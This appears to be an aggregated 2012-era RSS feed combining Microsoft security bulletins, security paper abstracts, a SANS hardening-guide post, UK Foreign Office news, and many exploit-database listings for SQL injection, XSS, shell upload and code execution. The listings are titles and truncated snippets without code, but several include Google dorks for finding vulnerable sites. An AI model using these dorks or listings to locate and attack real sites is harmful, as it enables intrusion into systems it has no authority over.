==> MS12-048 - Important : Vulnerability in Windows Shell Could Allow Remote Code Execution (2691442) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-047 - Important : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2718523) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-046 - Important : Vulnerability in Visual Basic for Applications Could Allow Remote Code Execution (2707960) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2719615): Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

http://www.offensivecomputing.net/?q=node/feed Dear like-mindeds, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community, especially those dealing with malware analysis and, accordingly, investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is, so to say, an unintentional implication of Microsoft's WOW64 technology and the according redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as "PatchGuard"), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public ("PatchGuard 3"). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> Possible Root Compromise of Greatandhra.com

http://blog.scansafe.com/journal/rss.xml A new attack emanating from the malware domain v3p2.com may be linked to a possible (alleged) root compromise of greatandhra.com, a news and media site with a worldwide Alexa rating of 2339. The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (CVE-2010-0806 / MS10-018). Successful exploitation leads to the silent installation of a data theft trojan delivered from n9uo.com. Both attack domains - v3p2.com and n9uo.com - were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website. Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained. First encounters resulting from these attacks began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file) ... are installed on the system where you are performing a penetration test, isn't it? I have decided to put up for sale, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Microsoft IE execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft IE 7, 8, 9

==> Microsoft IE 8 execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft IE 8

==> Microsoft Windows RDP PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows XP, 2003, Vista, 7, 2008

==> Microsoft Windows RDP Remote Code Execution PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows XP, 2003, Vista, 7, 2008

==> MS12-004 midiOutPlayNextPolyEvent Heap Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows Media

==> Cyber Security Awareness Month - Day 18 - Vendor Standards: The vSphere Hardening Guide, (Thu, Oct 18th)

http://isc.sans.org/rssfeed_full.xml Many vendors have security hardening guides - step-by-step guides to increasing the security posture of one product or another. We alluded to the Cisco guides earlier this month (Day 11); Microsoft also makes a decent set of hardening guides for Windows server and workstation products, as do most Linux distros - you'll find that most vendors have documents of this type. VMware's vSphere hardening guide is one I use frequently. It's seen several iterations over the years - the versions considered current are all stored at: http://www.vmware.com/support/support-resources/hardening-guides.html The initial guide for ESX 3.x (back in the day) was mostly CLI based, with commands executed mostly within the Linux shell on the individual ESX hosts. Things have changed quite a bit since then (and no, that wasn't a reference to the amount of grey in my hair!): the current version (5.0) covers the entire vSphere environment; it discusses settings for the ESXi hosts, the Virtual Machine guests, the Virtual Network (and physical network), the vCenter management platform and vCenter Update Manager. From both an auditor's and a system administrator's perspective, there are a number of oh-so-cool factors to this standard that make it a great example for vendor security documentation:
There is a clear description of why you might make any specific configuration change. The security exposure is clearly explained for each setting discussed, along with the severity.
Not every setting is a recommended setting. They are very clear that some security changes are recommended in all cases; others might only be recommended for DMZ settings, or some other exceptional circumstances. For each setting, they discuss in what situation that change would be deemed necessary.
Some security changes will break functionality that you might be expecting; for instance, it might disable something in vCenter, or it might break vCLI (a remote CLI command line API) functions. If a setting affects functionality, it is clearly spelled out.
There are several ways to get the job done. For each benchmark setting, several methods for effecting that change are discussed. Often there'll be a setting to tweak within vCenter, but whenever possible they'll also discuss how to accomplish the same task from a remote command line, either from PowerShell (using the PowerCLI API) or from a remote Windows or Linux command line (using their vCLI API command set). For instance, for something as simple as setting NTP (Network Time Protocol), they cover off: how to set NTP services up for the ESXi host in the vSphere Client application; what config file is updated (/etc/ntp.conf); from the vCLI (Virtual Command Line), how to audit this setting using vicfg-ntp (note that all the vCLI commands are run from a remote host, Linux or Windows, so this is a great audit tool!); how to update this setting using the vCLI, again using vicfg-ntp; how to list the NTP settings from all hosts in an environment using PowerCLI, VMware's PowerShell API (again, this is run remotely from a Windows host with PowerShell and the VMware PowerCLI installed); how to update all hosts in an environment using PowerCLI; and finally, an external link for more information.
Audit is not neglected in this document. Not only do they tell you how to make each change, they show you how to audit that change, to get the current value of the affected settings. Again, whenever possible, they discuss how to do the audit steps from as many toolsets as possible. You'll find that if you are an auditor looking at 10 servers, or a consultant working with a different client each week, the CLI approaches have a lot of appeal. Not only are they much quicker, but they are less prone to error, and you don't have to rekey anything. So, if you are an auditor, or a consultant who sees many clients, or a System Administrator who just wants to keep tabs on their environment, from this guide you can easily and simply create your own audit scripts. With these scripts in hand you are able to get accurate, repeatable security assessments (based on a published standard) of a vSphere environment. This means that you are delivering exactly the same security assessment for each client's environment. However, while the assessment is the same each time, the recommendations will not be - remember that there is a severity value for each assessed value, and also a discussion of in which situation each setting is recommended - the recommendations will vary quite a bit from one client to the next. Even if you are an auditor within a single organization, you'll find that results will vary from one audit to the next. Remember that this is an evolving standard - recommended settings change from one version of the guide to the next. You'll also find that when you combine security assessments with risk assessments (this is almost always desired), the risk equation will change depending on how the impacts are phrased, what has happened in the organization recently, or who is involved in the discussion. Security is unique in the fact that while the questions will be consistent over time and between organizations, the answers will change. You'll see them vary over time, across versions of a product, in different deployment situations and between organizations. I think this benchmark is a good example of a standard that is well equipped to handle this shifting landscape. (You'll find the vSphere Hardening Guide covered cover-to-cover in SANS SEC579.) If you have any stories on this article, or on this or other vendor security guides, please share - use our comment form.
Rob VandenBrink Metafore (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> New Orkut – Upload Images/Songs/Videos in Profile

http://www.thehackerslibrary.com/?feed=rss New Orkut! The latest buzz in the E-World. But now almost all have it. And it's still fresh. Owing to the fact that it's like Windows Vista compared to XP. [A huge copy of something else, but who cares as long as it looks good on your screen]. Well I am not here to write [...]

==> Get rid of Windows Vista Administrative Password

http://www.thehackerslibrary.com/?feed=rss Method 1: System Restore This only works in cases where you changed your password to something new and then forgot it or deleted a user account by accident. In order for this to work, there must be a System Restore point at which a logon was successful for the problem account. Also, this is not [...]

==> Static DLL Injection

http://www.thehackerslibrary.com/?feed=rss INTRODUCTION DEFINING DLL According to Microsoft, “A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Therefore, each program can use the functionality that is contained in [...]

==> Microsoft’s WorldWide Telescope: Virtual telescope opens night sky

http://www.thehackerslibrary.com/?feed=rss Where science meets imagination! Microsoft's WorldWide Telescope released, May 12th, 2008. Any Star Wars or Star Trek fan (like me) knows that space travel is not always easy, but Microsoft wants to make traveling the final frontier as simple as turning on your computer. Joining Google Sky and Stellarium is Microsoft's entrant to the [...]

==> [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011)

http://www.infosecnews.org/isn.rss InfoSec News: [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011): Forwarded from: ACM CCS 2011 <acmccs2011 (at) gmail.com> Apologies for multiple copies of this announcement. The annual ACM Computer and Communications Security Conference is a leading international forum for information security researchers, practitioners, developers, and users to explore cutting-edge ideas and results, and to exchange techniques, tools, and experiences. The conference seeks submissions from academia, government, and industry presenting novel research on all practical and theoretical aspects of computer and communications security. Papers should have relevance to the construction, evaluation, application, or operation of secure systems. Theoretical papers must make a convincing argument for the practical significance of the results. All topic areas related to computer and communications security are of interest and in scope. Accepted papers will be published by ACM Press in the conference proceedings. Outstanding papers will be invited for possible publication in a special issue of the ACM Transactions on Information and System Security.
Paper Submission Process: Submissions must be made by the deadline of May 6, 2011, through the website: http://www.easychair.org/conferences/?conf=ccs2011 The review process will be carried out in two phases and authors will have an opportunity to comment on the first-phase reviews. Authors will be notified of the first-phase reviews on Monday, June 20, 2011 and can send back their comments by Thursday, June 23, 2011. Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal, conference or workshop. Simultaneous submission of the same work is not allowed. Authors of accepted papers must guarantee that their papers will be presented at the conference.
Paper Format: Submissions must be at most 10 pages in double-column ACM format (note: pages must be numbered) excluding the bibliography and well-marked appendices, and at most 12 pages overall. Submissions must NOT be anonymized. Only PDF or Postscript files will be accepted. Submissions not meeting these guidelines risk rejection without consideration of their merits.
Tutorial Submissions: Proposals for long (3-hour) and short (1.5-hour) tutorials on research topics of current and emerging interest should be submitted electronically to the tutorials chair by May 24, 2011. The guidelines for tutorial proposals can be found on the website.
Important Dates: - Paper submission due: Friday, May 6, 2011 (23:59 UTC - 11) - First round reviews communicated to authors: Monday, June 20, 2011 - Author comments due on: Thursday, June 23, 2011 (23:59 UTC - 11) - Acceptance notification: Friday, July 15, 2011 - Final papers due: Thursday, August 11, 2011
GENERAL CHAIR: Yan Chen (Northwestern University, USA)
PROGRAM CHAIRS: George Danezis (Microsoft Research, UK) Vitaly Shmatikov (University of Texas at Austin, USA)
PROGRAM COMMITTEE: Michael Backes (Saarland University and MPI-SWS, Germany) Bruno Blanchet (INRIA, Ecole Normale Superieure, and CNRS, France) Dan Boneh (Stanford University, USA) Nikita Borisov (University of Illinois at Urbana-Champaign, USA) Herbert Bos (VU, Netherlands) Srdjan Capkun (ETHZ, Switzerland) Avik Chaudhuri (Adobe Advanced Technology Labs, USA) Shuo Chen (Microsoft Research, USA) Manuel Costa (Microsoft Research, UK) Anupam Datta (CMU, USA) Stephanie Delaune (CNRS and ENS-Cachan, France) Roger Dingledine (The Tor Project, USA) Orr Dunkelman (University of Haifa and Weizmann Institute, Israel) Ulfar Erlingsson (Google, USA) Nick Feamster (Georgia Tech, USA) Bryan Ford (Yale University, USA) Cedric Fournet (Microsoft Research, UK) Paul Francis (MPI-SWS, Germany) Michael Freedman (Princeton University, USA) Guofei Gu (Texas A&M University, USA) Nicholas
Hopper (University of Minnesota, USA) Collin Jackson (CMU Silicon Valley, USA) Markus Jakobsson (Paypal, USA) Jaeyeon Jung (Intel Labs Seattle, USA) Apu Kapadia (Indiana University Bloomington, USA) Jonathan Katz (University of Maryland, USA) Stefan Katzenbeisser (TU Darmstadt, Germany) Arvind Krishnamurthy (University of Washington, USA) Christopher Kruegel (University of California, Santa Barbara, USA) Ralf Kuesters (University of Trier, Germany) Ninghui Li (Purdue University, USA) Benjamin Livshits (Microsoft Research, USA) Heiko Mantel (TU Darmstadt, Germany) John Mitchell (Stanford University, USA) Fabian Monrose (University of North Carolina at Chapel Hill, USA) Steven Murdoch (University of Cambridge, UK) David Naccache (Ecole Normale Superieure, France) Arvind Narayanan (Stanford University, USA) Kenny Paterson (Royal Holloway, University of London, UK) Niels Provos (Google, USA) Mike Reiter (University of North Carolina at Chapel Hill, USA) Thomas Ristenpart (University of Wisconsin, USA) Hovav Shacham (University of California, San Diego, USA) Adam Smith (Pennsylvania State University, USA) Anil Somayaji (Carleton University, Canada) Francois-Xavier Standaert (UCL, Belgium) Eran Tromer (Tel Aviv University, Israel) Leendert Van Doorn (AMD, USA) Paul Van Oorschot (Carleton University, Canada) Bogdan Warinschi (University of Bristol, UK) Brent Waters (University of Texas at Austin, USA) Robert Watson (University of Cambridge, United Kingdom) Xiaowei Yang (Duke University, USA) Haifeng Yu (National University of Singapore, Singapore)

==> Number 10 statement on Beirut attack

http://feeds.feedburner.com/FcoLatestNewsRssFeed Following the bomb attack in Lebanon today, a Number 10 spokesperson has given a statement.

==> Foreign Secretary echoes call for Eid ceasefire in Syria

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague: "A ceasefire must be accompanied by genuine commitment from the Syrian regime to work with Lakhdar Brahimi to find a sustainable end to the violence in Syria".

==> This week at the Foreign Office

http://feeds.feedburner.com/FcoLatestNewsRssFeed A look at the work of the Foreign Office and its embassies overseas this week.

==> Foreign Secretary horrified by Lebanon bombing

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague said that this was a horrendous act that showed an appalling contempt for human life.

==> Foreign Office Minister strongly condemns Israeli settlement plans

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Office Minister Alistair Burt has condemned Israel's plans to expand the illegal settlement of Gilo on the southern flank of East Jerusalem and urges the Israeli Government to change its approach.

==> Fourteenth Hajj Consular Delegation launches

http://feeds.feedburner.com/FcoLatestNewsRssFeed The Hajj Consular Delegation to accompany British pilgrims to Saudi Arabia was launched today by Foreign Office Minister Mark Simmonds.

==> UK-Japan Strategic Dialogue meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague met the Japanese Foreign Minister, Koichiro Gemba, for the first meeting of the new foreign policy "Strategic Dialogue" with Japan.

==> FCO has answered questions on Iran sanctions via social media

http://feeds.feedburner.com/FcoLatestNewsRssFeed As the EU announced further sanctions against Iran, the FCO answered your questions about Iran sanctions via the ‘UK for Iranians’ social media channels.

==> UK to invest in a future generation of code-breakers

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague has launched a new drive to find and nurture the next generation of code-breakers and computer scientists.

==> Foreign Office gives update on countries featured in Human Rights and Democracy Report

http://feeds.feedburner.com/FcoLatestNewsRssFeed The Foreign Office has published new reporting on 28 Countries of Concern, along with updates on the case study countries featured in the annual human rights report. The quarterly updates cover the period from July to September 2012.

==> Internet Explorer 9 XSS Filter Bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Internet Explorer 9 XSS Filter Bypass Risk: Low Text: # Internet Explorer 9 XSS Filter Bypass # Discovered by: Jean Pascal Pereira

==> F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection Risk: Low Text:1. OVERVIEW F5 FirePass SSL VPN is vulnerable to Open URL Redirection. 2. BACKGROUND F5 FirePass SSL VPN provides se...

==> Henok CMS SQL Injection & Easy Login Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Henok CMS SQL Injection & Easy Login Vulnerability Risk: Medium Text:-=- In The Name Of God -=- -- @ Henok CMS SQL Injection & Easy Login Vulnerability ...

==> gonginteractive Web Design SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: gonginteractive Web Design SQL Injection Vulnerability Risk: Medium Text: ## gonginteractive Web Design Sql Injection Vulnerability ## + # Expl...

==> DotProject 2.1.5 XSS and SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: DotProject 2.1.5 XSS and SQL Injection Risk: Low Text:Information -- Name : XSS and SQL Injection Vulnerabilities in DotProject Software : DotProject 2.1.5 and possibly b...

==> ClipBucket 2.6 XSS Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ClipBucket 2.6 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in ClipBucket Software : ClipBucket 2.6 and possibly below. Vendor Homepa...

==> CMSMini 0.2.2 XSS Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CMSMini 0.2.2 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in CMSMini Software : CMSMini 0.2.2 and possibly below. Vendor Homepage :...

==> TaskFreak 0.6.4 XSS Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: TaskFreak 0.6.4 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in TaskFreak Software : TaskFreak 0.6.4 and possibly below. Vendor Homepa...

==> WordPress Wordfence Security XSS and IAA vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: WordPress Wordfence Security XSS and IAA vulnerabilities Risk: Low Text:I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for Word...

==> CA ARCserve Backup Security Notice

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CA ARCserve Backup Security Notice Risk: Medium Text:CA20121018-01: Security Notice for CA ARCserve Backup Issued: October 18, 2012 CA Technologies support is alerting custom...

==> Campaign Enterprise 11 SQL Injection & Unauthorized Access

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Campaign Enterprise 11 SQL Injection & Unauthorized Access Risk: Medium Text:Overview Campaign Enterprise 11, by ArialSoftware (www.arialsoftware.com), "is a mass email system you install on your...

==> ManageEngine Security Manager Plus <=5.5 Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ManageEngine Security Manager Plus <=5.5 Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> ManageEngine Security Manager Plus 5.5 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ManageEngine Security Manager Plus 5.5 SQL Injection Risk: Medium Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> ManageEngine Security Manager Plus 5.5 Traversal

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ManageEngine Security Manager Plus 5.5 Traversal Risk: High Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> Joomla Tag SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Tag SQL Injection Risk: Medium Text: Exploit Title: Joomla tag Remote Sql Exploit dork: inurl:index.php?option=com_tag Date: [18-10-2012] Author: Dan...

==> Joomla Freestyle Support 1.9 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Freestyle Support 1.9 SQL Injection Risk: Medium Text: Exploit Title: Joomla Freestyle Support com_fss sqli Dork: N/A Date: [17-10-2012] Author: Daniel Barragan "D4NB4...

==> Joomla Commedia 3.1 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Commedia 3.1 SQL Injection Risk: Medium Text: Exploit Title: Joomla commedia Remote Exploit dork: inurl:index.php?option=com_commedia Date: [18-10-2012] Autho...

==> CMSQLITE 1.3.2 Multiple Web Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CMSQLITE 1.3.2 Multiple Web Vulnerabilities Risk: Medium Text:Title: CMSQLITE v1.3.2 - Multiple Web Vulnerabilities Date: == 2012-10-18 References: == http://www.vuln...

==> Oracle Database Authentication Protocol Security Bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Oracle Database Authentication Protocol Security Bypass Risk: Medium Text:Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker ca...

==> OTRS 3.1 Stored XSS Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: OTRS 3.1 Stored XSS Vulnerability Risk: Low Text:#!/usr/bin/python ''' Author: Mike Eduard - Znuny - Enterprise Services for OTRS Product: OTRS Open Technology Real Se...

==> RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Risk: High Text:Title : RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Version : 15.0.6.14 Date : 2012-10-18 Vendor : ...

==> Palo Alto Networks GlobalProtect Man-In-The-Middle

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Palo Alto Networks GlobalProtect Man-In-The-Middle Risk: Low Text: SySS-Advisory: MitM-vulnerability in Palo Alto Networks GlobalProtect Prob...

==> Unirgy uStoreLocator Magento Extension SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Unirgy uStoreLocator Magento Extension SQL Injection Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-1 > == title: SQL Injection ...

==> ModSecurity 2.6.8 multipart/invalid part ruleset bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ModSecurity 2.6.8 multipart/invalid part ruleset bypass Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-0 > == title: ModSecurity mul...

==> jCore 1.0pre Cross Site Scripting & SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: jCore 1.0pre Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23107 Product: jCore Vendor: jcore.net Vulnerable Version(s): 1.0pre and probably prior Tested Version: 1....

==> ATutor AContent 1.2 XSS & Authentication & SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ATutor AContent 1.2 XSS & Authentication & SQL Injection Risk: Medium Text:Advisory ID: HTB23117 Product: AContent Vendor: ATutor Vulnerable Version(s): 1.2 and probably prior Tested Version: 1.2 V...

==> Subrion CMS 2.2.1 XSS / CSRF / SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Subrion CMS 2.2.1 XSS / CSRF / SQL Injection Risk: Medium Text:Advisory ID: HTB23113 Product: Subrion CMS Vendor: The Subrion development team Vulnerable Version(s): 2.2.1 and probably pr...

==> Pmsme SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Pmsme SQL Injection Vulnerability Risk: Medium Text: ## # Title: Powered By: Pmsme SQL Injection Vulnerability # Google Dork: inurl:"page.php?p_id=" Powered By: P...

==> SanaNet Remote Sql Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: SanaNet Remote Sql Injection Vulnerability Risk: Medium Text: Exploit Title : SanaNet Remote Sql Injection Vulnerability Author : N3TD3V!L Discovered By : Sec-Advisor...

==> Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks Risk: Low Text:1. OVERVIEW Credential leaks lead to complete compromise of home automation system 2. BACKGROUND The 2 devices are id...

==> Wordpress Social Discussions Plugin Multiple Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Wordpress Social Discussions Plugin Multiple Vulnerabilities Risk: Medium Text:[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin == Author: Janek Vind "waraxe"...

==> Oracle WebCenter Sites Multiple vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Oracle WebCenter Sites Multiple vulnerabilities Risk: Low Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-2 > == title: Multiple vulner...

==> Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure Risk: High Text: Vulnerable software: Videosmate Organizer V 4.2 (all versions) Vendor: http://videosmate.com/ Software License: Commercial...

==> MyBB Profile Albums 0.9 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB Profile Albums 0.9 SQL Injection Risk: Medium Text:# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day # Google Dork: inurl:albums.php intext:"powered by Mybb" # Dat...

==> Sisfokol 4.0 Shell Upload

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Sisfokol 4.0 Shell Upload Risk: High Text:Undergroundthalo Hacking Team - Security Advisory Release Date. 13-Okt-2012 Last Update. - ...

==> TinyWebGallery 1.8.3 Remote Command Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: TinyWebGallery 1.8.3 Remote Command Execution Risk: High Text:TinyWebGallery 1.8.3 Remote Command Execution [] > Date : 05- 01- 2012 [] > Author : ...

==> CakePHP 2.2.0-RC2 XXE Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CakePHP 2.2.0-RC2 XXE Injection Risk: Medium Text:# Exploit title: CakePHP XXE injection # Date: 01.07.2012 # Software Link: http://www.cakephp.org # Vulnerable version: 2.x ...

==> MangosWeb SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MangosWeb SQL Injection Vulnerability Risk: Medium Text:EXPLOIT TITLE: MangosWeb SQL Vulnerability DATE: 1/7/2012 BY Hood3dRob1n AFFECTED PRODUCTS: MangosWeb Enhanced Version 3.0.3...

==> Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities Risk: Medium Text:# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities # Date: 01/06/2012 # Author: Gianluca Brindi...

==> Wordpress Plugin BackWPup 1.6.1 Remote auth bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Wordpress Plugin BackWPup 1.6.1 Remote auth bypass Risk: High Text:Sense of Security - Security Advisory - SOS-11-003 Release Date. 28-Mar-2011 Last Update. ...

==> web - Joomla Component com_kunena - SQL Injection Vulnerability / Cross-Site Scripting

http://www.1337day.com/rss

==> web - Zip Code Locator - CSRF/SQLi Vulnerabilities

http://www.1337day.com/rss

==> web - Peruestudio - SQL Injection Vulnerability / LFI

http://www.1337day.com/rss

==> web - NetBoot - SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - RealPlayer 15.0.6.14 (.3GP) Arbitrary Code Execution POC

http://www.1337day.com/rss

==> web - ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal

http://www.1337day.com/rss

==> remote - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)

http://www.1337day.com/rss

==> remote - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi

http://www.1337day.com/rss

==> web - AdaptCMS 2.0.4 CSRF Vulnerability

http://www.1337day.com/rss

==> local - BestPlay v4.1 (.mp3) Crash PoC

http://www.1337day.com/rss

==> web - Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure

http://www.1337day.com/rss

==> web - jCore 1.0pre Cross Site Scripting / SQL Injection

http://www.1337day.com/rss

==> web - WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure

http://www.1337day.com/rss

==> web - BSW Gallery Shell Upload Vulnerability

http://www.1337day.com/rss

==> web - Amateur Photographer 's Image Gallery 0.9a XSS / SQL Injection

http://www.1337day.com/rss

==> web - OTRS 3.1 Stored XSS Vulnerability

http://www.1337day.com/rss

==> web - Subrion CMS 2.2.1 XSS / CSRF / SQL Injection

http://www.1337day.com/rss

==> web - Joomla Component com_commedia SQL Injection Exploit

http://www.1337day.com/rss

